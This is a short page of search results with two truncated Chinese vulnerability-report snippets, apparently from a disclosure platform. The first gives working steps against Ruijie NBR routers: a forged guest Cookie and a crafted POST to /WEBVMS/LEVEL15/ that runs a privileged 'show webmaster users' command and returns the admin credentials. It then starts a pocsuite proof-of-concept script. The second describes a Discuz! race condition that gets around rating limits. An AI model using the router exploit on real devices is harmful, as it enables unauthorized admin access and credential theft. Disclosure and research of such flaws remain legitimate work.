2 matches found
Ruijie Router NBR 信息泄漏漏洞
使用ModifyHeaders修改Cookie头为:auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;使用Hackbar发送POST包到:http://localhost/WEBVMS/LEVEL15/内容为:command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIVEXEC&signname=Red-Giant. 得到admin的帐号密码。 !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req fr...
Discuz!评分功能可突破限制导致刷分(官方测试成功)
简要描述: Discuz帖子评分功能中在某些操作下可能可以突破评分的限制(每日最大评分和帖子重复评分) 详细说明: 因为自己对漏洞/Bug的定义不了解,无法确定这个是否属于漏洞或是Bug,但是因为在Discuz!官方论坛X3和自己的论坛X2.5测试成功,并且确实能突破限制达到刷分的目的,所以来Wooyun报告一下。 之前一个朋友发现在评分操作时,可以通过快速点击“评分”来实现对一个帖子的重复评分(在后台关闭“允许重复评分”功能时),所以猜测这里Discuz没有做防护工作。...